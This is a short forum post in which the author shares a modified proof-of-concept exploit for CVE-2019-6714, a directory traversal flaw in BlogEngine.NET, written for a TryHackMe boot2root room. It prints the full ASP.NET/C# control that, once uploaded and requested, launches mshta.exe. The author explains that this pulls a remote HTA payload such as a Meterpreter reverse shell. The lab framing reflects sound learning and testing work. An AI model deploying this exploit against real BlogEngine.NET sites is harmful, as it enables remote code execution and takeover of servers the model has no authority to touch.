Modified CVE-2019-6714 PoC to execute payload via mshta.exe

Hey y’all. This will be a quick post discussing my experience in exploit development where I modify the exploit for the CVE-2019-6714 vulnerability; specifically the exploit devevloped by Cobb (2019), which exploits a directory traversal vulnerability in the BlogEngine[.]NET content management system.

This was done for a TryHackMe boot2root machine — which I documented in the InfoSec Write-ups journal (see “Aleksey” 2022a; if the paywall is giving you problems, you can view it by opening your browser in private mode :wink: ).

I discuss the specifics on how to exploit this vulnerability in my writeup, but TL;DR — it works by uploading a C# script onto a BlogEngine[.]NET powered website that is vulnerable to CVE-2019-6714 and then triggering the exploit to execute via a GET request to said C# script.

I posted my modified version of Cobb’s exploit onto one of my GitHub repos. The source code, minus the comments, of my modified exploit is:

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        System.Diagnostics.Process payload = new System.Diagnostics.Process();
        payload.StartInfo.FileName = "mshta.exe";
        payload.StartInfo.Arguments = "";
        payload.StartInfo.UseShellExecute = true;
        payload.StartInfo.CreateNoWindow = true;
        payload.Start();
    }
    
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Cobb’s original exploit uses C# network sockets libraries to make a reverse shell onto the attacker’s machine. The TryHackMe room had me “upgrade” my shell to the Meterpreter shell, but I decided to bypass that by modify Cobb’s exploit to execute code via mshta.exe, then generate a Meterpreter payload that executes via an HTA server, then upload this script to the BlogEngine[.]NET website, trigger it and finally get a reverse Meterpreter shell. The line payload.StartInfo.Arguments = ""; should contain the URL to the malicious HTA file to execute a payload (note that the HTA server could be any payload, not necessarily a reverse Meterpreter shell).

Conclusion

This isn’t really a remarkable discovery — just “building off” the discovery of someone smarter than myself and trying to make my life easier. Plus, I’m trying to be a hacker — and what made me want to do go on with modifying Cobb’s exploit is that I didn’t want to follow the room’s instructions exactly as laid out. I gotta deviate from it in some way :wink:

Of course, I welcome any feedback or criticisms regarding my work :smiley:

References

2 Likes